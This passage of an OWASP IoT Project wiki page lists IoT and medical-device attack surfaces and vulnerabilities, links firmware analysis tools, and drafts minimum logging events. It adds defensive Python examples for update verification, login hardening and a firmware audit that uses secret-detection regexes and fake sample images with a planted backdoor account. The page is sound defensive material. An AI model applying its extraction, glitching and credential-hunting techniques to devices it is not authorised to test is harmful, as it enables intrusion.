|-<br />
|}<br />
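The Update Mechanism and Device Firmware rows above list unsigned updates, missing update verification and firmware downgrade as things to look for. The following is an added example, not code from the OWASP IoT Project, showing the three checks a device-side updater should make before writing anything to flash: authenticate the manifest, verify the image hash it names, and refuse any version older than the one installed. HMAC-SHA256 under a constructed device key stands in for a vendor signature so that the example runs with only the Python standard library; a production updater should verify an asymmetric signature (for example Ed25519 or RSA-PSS) so that no key capable of producing a valid update is ever stored on the device. All names, keys and version numbers are assumptions made for the demo.<br />

```python
"""Device-side firmware update verification with anti-rollback.

Added example, not OWASP IoT Project code. HMAC-SHA256 under a constructed
device key stands in for a vendor signature so the example needs only the
standard library; a production updater should verify an asymmetric signature
(Ed25519, RSA-PSS) so that no forging-capable key is stored on the device.
"""
import hashlib
import hmac
import json
from typing import Any, Dict, Tuple

# Constructed demo key; a real device would hold only a vendor public key.
VENDOR_KEY = b"demo-vendor-key-not-for-production"


def build_update(key: bytes, version: int, image: bytes) -> Dict[str, Any]:
    """Vendor side: produce an authenticated manifest naming the image hash and version."""
    manifest = {"version": version, "sha256": hashlib.sha256(image).hexdigest()}
    body = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    tag = hmac.new(key, body, hashlib.sha256).hexdigest()
    return {"manifest": body, "tag": tag, "image": image}


class Device:
    def __init__(self, key: bytes, installed_version: int):
        self.key = key
        self.installed_version = installed_version
        self.image = b""

    def apply_update(self, update: Dict[str, Any]) -> Tuple[bool, str]:
        # 1. Authenticate the manifest before parsing anything in it, so an
        #    attacker-supplied manifest never reaches the JSON parser.
        expected = hmac.new(self.key, update["manifest"], hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, update["tag"]):
            return False, "manifest authentication failed"
        manifest = json.loads(update["manifest"])
        # 2. Anti-rollback: refuse any image older than what is installed, even
        #    a genuine vendor-authenticated one (it may carry a known vulnerability).
        if manifest["version"] < self.installed_version:
            return False, "rollback to version %d refused" % manifest["version"]
        # 3. Bind the image to the authenticated manifest through its hash, and
        #    verify the whole image before writing a single block.
        if hashlib.sha256(update["image"]).hexdigest() != manifest["sha256"]:
            return False, "image hash mismatch"
        self.image = update["image"]
        self.installed_version = manifest["version"]
        return True, "installed version %d" % manifest["version"]


if __name__ == "__main__":
    dev = Device(VENDOR_KEY, installed_version=2)
    print(dev.apply_update(build_update(VENDOR_KEY, 3, b"firmware-v3")))
    print(dev.apply_update(build_update(VENDOR_KEY, 1, b"firmware-v1")))
```

The order of the checks matters: authentication comes first so that no untrusted bytes are parsed, and the version check comes before the (comparatively expensive) hash of the full image so a downgrade attempt is rejected cheaply. The stored version should live in tamper-resistant storage on the device, otherwise the anti-rollback check can be undone by editing it.<br />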
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to, for example, '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. still using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* The service can be attacked in a way that denies service, either to that service alone or to the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as the source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb, the execution of the firmware on the device can be modified to bypass almost all software-based security controls.<br />
* Side-channel attacks can also alter the execution flow or leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we obtain full console access to the device<br />
* Security measures usually include custom bootloaders that prevent the attacker from entering single-user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out-of-date versions of BusyBox, OpenSSL, SSH, web servers, etc.<br />
|-<br />
<br />
|}<br />
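The Username Enumeration, Weak Passwords and Account Lockout rows above describe the credential-management weaknesses that recur across the administrative, device web, cloud and mobile interfaces. The login handler below is an added example, not code from the OWASP IoT Project: it returns one generic failure message for unknown users, wrong passwords and locked accounts alike, does the same amount of password-hashing work whether or not the username exists, and locks an account after MAX_FAILURES consecutive failures instead of letting attempts continue indefinitely. The user store, the threshold and the injectable clock are constructed for the demo.<br />

```python
"""Login handler hardened against username enumeration and missing lockout.

Added example, not OWASP IoT Project code. The user store, lockout threshold
and injectable clock are constructed for the demo.
"""
import hashlib
import hmac
import os
import time
from typing import Callable, Dict, List, Optional, Tuple

MAX_FAILURES = 5                 # consecutive failures before the account is locked
LOCKOUT_SECONDS = 15 * 60        # how long the lock lasts
PBKDF2_ROUNDS = 100_000
# One message for every failure path, so a response never reveals whether the
# username exists or whether the account is currently locked.
GENERIC_ERROR = "invalid username or password"


def hash_password(password: str, salt: Optional[bytes] = None) -> bytes:
    """Return salt || PBKDF2-HMAC-SHA256(password); the password itself is never stored."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt + digest


def check_password(stored: bytes, password: str) -> bool:
    salt, digest = stored[:16], stored[16:]
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)   # constant-time comparison


# Constructed demo user store (username -> salted hash)
USERS: Dict[str, bytes] = {"admin": hash_password("correct horse battery staple")}
# A dummy hash is checked for unknown usernames so that the request costs the
# same as for a known user (timing-based username enumeration).
_DUMMY_HASH = hash_password("unused")


class Authenticator:
    def __init__(self, users: Dict[str, bytes], now: Callable[[], float] = time.time):
        self.users = users
        self.now = now
        # username -> [consecutive failures, locked_until timestamp]
        self.failures: Dict[str, List[float]] = {}

    def login(self, username: str, password: str) -> Tuple[bool, str]:
        count, locked_until = self.failures.get(username, [0, 0.0])
        if self.now() < locked_until:
            # Locked: still run the password check (uniform timing), then refuse.
            check_password(self.users.get(username, _DUMMY_HASH), password)
            return False, GENERIC_ERROR
        if locked_until:                       # a previous lock has expired: start fresh
            count, locked_until = 0, 0.0
        stored = self.users.get(username, _DUMMY_HASH)
        ok = check_password(stored, password) and username in self.users
        if ok:
            self.failures.pop(username, None)  # a successful login clears the counter
            return True, "ok"
        count += 1
        if count >= MAX_FAILURES:
            locked_until = self.now() + LOCKOUT_SECONDS
        self.failures[username] = [count, locked_until]
        return False, GENERIC_ERROR


if __name__ == "__main__":
    auth = Authenticator(USERS)
    print(auth.login("admin", "wrong"))          # (False, 'invalid username or password')
    print(auth.login("nobody", "wrong"))         # same message for an unknown user
    print(auth.login("admin", "correct horse battery staple"))
```

Note that the lock is keyed on the username, so a lock can be triggered by anyone who knows it; production systems usually pair it with per-source rate limiting and a second factor so that a lockout cannot be turned into a denial of service against legitimate users.<br />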
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Data Flow'''<br />
|<br />
* What data is being captured?<br />
* How does it move within the ecosystem?<br />
* How is it protected in transit?<br />
* How is it protected at rest?<br />
* Who is that data shared with?<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damaging (Physically)<br />
* Failure state analysis<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Medical Attack Surfaces project? ==<br />
<br />
The Medical Attack Surfaces project provides:<br />
<br />
* A simple way for testers, manufacturers, developers, and users to get an understanding of the complexity of a modern medical environment<br />
* Allows people to visualize the numerous attack surfaces that need to be defended within medical equipment ecosystems<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Daniel Miessler presented on using Adaptive Testing Methodologies to evaluate the security of medical devices at RSA 2017.<br />
<br />
|}<br />
<br />
= Firmware Analysis =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Firmware Analysis Project ==<br />
<br />
The Firmware Analysis Project is intended to provide security testing guidance for the IoT Attack Surface "Device Firmware":<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Section<br />
! <br />
|- <br />
|<br />
Device Firmware Vulnerabilities<br />
|<br />
* Out-of-date core components<br />
* Unsupported core components<br />
* Expired and/or self-signed certificates<br />
* Same certificate used on multiple devices<br />
* Admin web interface concerns<br />
* Hardcoded or easy to guess credentials<br />
* Sensitive information disclosure<br />
* Sensitive URL disclosure<br />
* Encryption key exposure<br />
* Backdoor accounts<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
|-<br />
|<br />
Manufacturer Recommendations<br />
|<br />
* Ensure that supported and up-to-date software is used by developers<br />
* Ensure that robust update mechanisms are in place for devices<br />
* Ensure that certificates are not duplicated across devices and product lines.<br />
* Develop a mechanism to ensure a new certificate is installed when old ones expire<br />
* Disable deprecated SSL versions<br />
* Ensure developers do not code in easy to guess or common admin passwords<br />
* Ensure services such as SSH have a secure password created<br />
* Develop a mechanism that requires the user to create a secure admin password during initial device setup<br />
* Ensure developers do not hard code passwords or hashes<br />
* Have source code reviewed by a third party before releasing device to production<br />
* Ensure industry standard encryption or strong hashing is used<br />
|-<br />
|<br />
Device Firmware Guidance and Instruction<br />
|<br />
* Firmware file analysis<br />
* Firmware extraction<br />
* Dynamic binary analysis<br />
* Static binary analysis<br />
* Static code analysis<br />
* Firmware emulation<br />
* File system analysis<br />
|-<br />
|<br />
Device Firmware Tools<br />
|<br />
* [https://github.com/craigz28/firmwalker Firmwalker] <br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://github.com/angr/angr Angr binary analysis framework]<br />
* [http://binwalk.org/ Binwalk firmware analysis tool]<br />
* [http://www.binaryanalysis.org/en/home Binary Analysis Tool]<br />
* [https://github.com/firmadyne/firmadyne Firmadyne]<br />
|-<br />
|<br />
Vulnerable Firmware<br />
|<br />
* [https://github.com/praetorian-inc/DVRF Damn Vulnerable Router Firmware]<br />
|-<br />
|}<br />
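A file-system audit covering several rows of the table above (encryption key exposure, the same certificate reused across devices, hard-coded credentials, weak or empty password hashes, backdoor accounts), written as an added example for this page rather than code from the OWASP project or the tools it links; the two firmware images it scans are constructed in memory with placeholder PEM bodies, and load_rootfs() is the hypothetical entry point for a real extracted tree.<br />
<br />
```python
"""Audit an extracted firmware root filesystem for items from the "Device
Firmware Vulnerabilities" table: exposed private keys, one certificate shared
by several devices/images, hard-coded credentials, empty or weak password
hashes, and backdoor (uid 0) accounts.
Added example for this page; not code from the OWASP project or the tools it
links. IMAGE_A/IMAGE_B are constructed in memory with placeholder PEM bodies;
load_rootfs() reads a real extracted tree (e.g. binwalk output) instead.
"""
import hashlib
import os
import re
from typing import Dict, List

FS = Dict[str, bytes]  # relative path -> file contents

PEM_KEY_RE = re.compile(rb"-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----")
PEM_CERT_RE = re.compile(rb"-----BEGIN CERTIFICATE-----.*?-----END CERTIFICATE-----", re.S)
# crypt(3) forms that are cheap to brute force: 13-char DES and $1$ (MD5)
WEAK_HASH_RE = re.compile(r"^(\$1\$|[./0-9A-Za-z]{13}$)")
# NAME=value assignments in scripts/configs whose name suggests a secret
HARDCODED_RE = re.compile(rb"(?im)^\s*(?:export\s+)?([A-Z_]*(?:PASS(?:WORD|WD)?|SECRET|TOKEN)[A-Z_]*)\s*=\s*['\"]?[^\s'\"]+")


def load_rootfs(root: str) -> FS:
    """Read every regular file under `root` (symlinks skipped) into an FS map."""
    fs: FS = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full) and not os.path.islink(full):
                with open(full, "rb") as fh:
                    fs[os.path.relpath(full, root)] = fh.read()
    return fs


def find_private_keys(fs: FS) -> List[str]:
    """Paths holding a PEM private key ("Encryption key exposure")."""
    return sorted(p for p, data in fs.items() if PEM_KEY_RE.search(data))


def cert_fingerprints(fs: FS) -> Dict[str, List[str]]:
    """SHA-256 of each PEM certificate blob -> paths that embed it."""
    out: Dict[str, set] = {}
    for path, data in fs.items():
        for m in PEM_CERT_RE.finditer(data):
            out.setdefault(hashlib.sha256(m.group(0)).hexdigest(), set()).add(path)
    return {fp: sorted(paths) for fp, paths in out.items()}


def shared_certs(images: Dict[str, FS]) -> Dict[str, List[str]]:
    """Fingerprints found in more than one image ("Same certificate used on
    multiple devices"): compare firmware from different models or versions."""
    seen: Dict[str, set] = {}
    for name, fs in images.items():
        for fp in cert_fingerprints(fs):
            seen.setdefault(fp, set()).add(name)
    return {fp: sorted(n) for fp, n in seen.items() if len(n) > 1}


def find_hardcoded_credentials(fs: FS) -> List[str]:
    """'path: VARIABLE' for each secret-looking assignment in a text file."""
    hits = []
    for path, data in fs.items():
        if b"\x00" in data[:512]:
            continue  # binary; a strings(1)-style pass is a separate step
        hits += [f"{path}: {m.group(1).decode()}" for m in HARDCODED_RE.finditer(data)]
    return sorted(hits)


def audit_accounts(fs: FS) -> List[str]:
    """Non-root uid 0 accounts in etc/passwd; empty or weak hashes in etc/shadow."""
    findings = []
    for line in fs.get("etc/passwd", b"").decode(errors="replace").splitlines():
        f = line.split(":")
        if len(f) >= 7 and f[2] == "0" and f[0] != "root" and f[6] not in ("/bin/false", "/sbin/nologin"):
            findings.append(f"backdoor account: {f[0]} has uid 0 with shell {f[6]}")
    for line in fs.get("etc/shadow", b"").decode(errors="replace").splitlines():
        f = line.split(":")
        if len(f) < 2:
            continue
        user, h = f[0], f[1]
        if h == "":
            findings.append(f"empty password: {user}")
        elif not h.startswith(("!", "*")) and WEAK_HASH_RE.match(h):  # "!"/"*" = locked
            findings.append(f"weak password hash: {user}")
    return findings


# Constructed sample images; PEM bodies are placeholders, not real key material.
_CERT = b"-----BEGIN CERTIFICATE-----\nPLACEHOLDER-CERT-BODY\n-----END CERTIFICATE-----\n"
IMAGE_A: FS = {
    "etc/ssl/server.crt": _CERT,
    "etc/ssl/server.key": b"-----BEGIN RSA PRIVATE KEY-----\nPLACEHOLDER\n-----END RSA PRIVATE KEY-----\n",
    "etc/passwd": b"root:x:0:0:root:/root:/bin/sh\nsupport:x:0:0::/:/bin/sh\nnobody:x:99:99::/:/bin/false\n",
    "etc/shadow": b"root::0:0:99999:7:::\nsupport:$1$Xy$abcdefghijklmnopqrstuv:0:0:99999:7:::\nnobody:*:0:0:99999:7:::\n",
    "etc/init.d/cloud.sh": b"#!/bin/sh\nexport API_TOKEN=placeholder-token\n/usr/bin/agent\n",
    "bin/agent": b"\x7fELF\x00\x00PASSWORD=not-scanned-here",
}
IMAGE_B: FS = {"etc/ssl/server.crt": _CERT, "etc/passwd": b"root:x:0:0:root:/root:/bin/sh\n"}
```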
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the Firmware Analysis Project? ==<br />
<br />
The Firmware Analysis Project provides:<br />
<br />
* Security testing guidance for vulnerabilities in the "Device Firmware" attack surface<br />
* Steps for extracting file systems from various firmware files<br />
* Guidance on searching a file system for sensitive or interesting data<br />
* Information on static analysis of firmware contents<br />
* Information on dynamic analysis of emulated services (e.g. web admin interface)<br />
* Testing tool links<br />
* A site for pulling together existing information on firmware analysis<br />
<br />
== Project Leaders ==<br />
<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security Project]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/IoT_Firmware_Analysis IoT Firmware Analysis Primer]<br />
* [https://otalliance.org/initiatives/internet-things Online Trust Alliance - Internet of Things]<br />
* [https://people.debian.org/~aurel32/qemu/ Pre-compiled QEMU images]<br />
* [https://code.google.com/archive/p/firmware-mod-kit/ Firmware Modification Kit]<br />
* [https://craigsmith.net/episode-11-1-firmware-extraction/ Short Firmware Extraction Video]<br />
* [https://craigsmith.net/episode-12-1-firmware-emulation-with-qemu/ Firmware Emulation with QEMU]<br />
* [https://craigsmith.net/episode-18-1-file-extraction-from-network-capture/ File Extraction from Network Capture]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Event Logging Project=<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File: OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Logging Events==<br />
<br />
This is a working draft of the recommended minimum IoT Device logging events. This includes many different types of devices, including consumer IoT, enterprise IoT, and ICS/SCADA type devices.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Event Category<br />
! Events<br />
|-<br />
| '''Request Exceptions'''<br />
|<br />
* Attempt to Invoke Unsupported HTTP Method<br />
* Unexpected Quantity of Characters in Parameter<br />
* Unexpected Type of Characters in Parameter<br />
|-<br />
| '''Authentication Exceptions'''<br />
|<br />
* Multiple Failed Passwords<br />
* High Rate of Login Attempts<br />
* Additional POST Variable<br />
* Deviation from Normal GEO Location<br />
|-<br />
| '''Session Exceptions'''<br />
|<br />
* Modifying the Existing Cookie<br />
* Substituting Another User's Valid SessionID or Cookie<br />
* Source Location Changes During Session<br />
|-<br />
| '''Access Control Exceptions'''<br />
|<br />
* Modifying URL Argument Within a GET for Direct Object Access Attempt<br />
* Modifying Parameter Within a POST for Direct Object Access Attempt<br />
* Forced Browsing Attempt<br />
|-<br />
| '''Ecosystem Membership Exceptions'''<br />
|<br />
* Traffic Seen from Disenrolled System<br />
* Traffic Seen from Unenrolled System<br />
* Failed Attempt to Enroll in Ecosystem<br />
* Multiple Attempts to Enroll in Ecosystem<br />
|-<br />
| '''Device Access Events'''<br />
|<br />
* Device Case Tampering Detected<br />
* Device Logic Board Tampering Detected<br />
|-<br />
| '''Administrative Mode Events'''<br />
|<br />
* Device Entered Administrative Mode<br />
* Device Accessed Using Default Administrative Credentials<br />
|-<br />
| '''Input Exceptions'''<br />
|<br />
* Double Encoded Character<br />
* Unexpected Encoding Used<br />
|-<br />
| '''Command Injection Exceptions'''<br />
|<br />
* Blacklist Inspection for Common SQL Injection Values<br />
* Abnormal Quantity of Returned Records<br />
|-<br />
| '''Honey Trap Exceptions'''<br />
|<br />
* Honey Trap Resource Requested<br />
* Honey Trap Data Used<br />
|-<br />
| '''Reputation Exceptions'''<br />
|<br />
* Suspicious or Disallowed User Source Location<br />
<br />
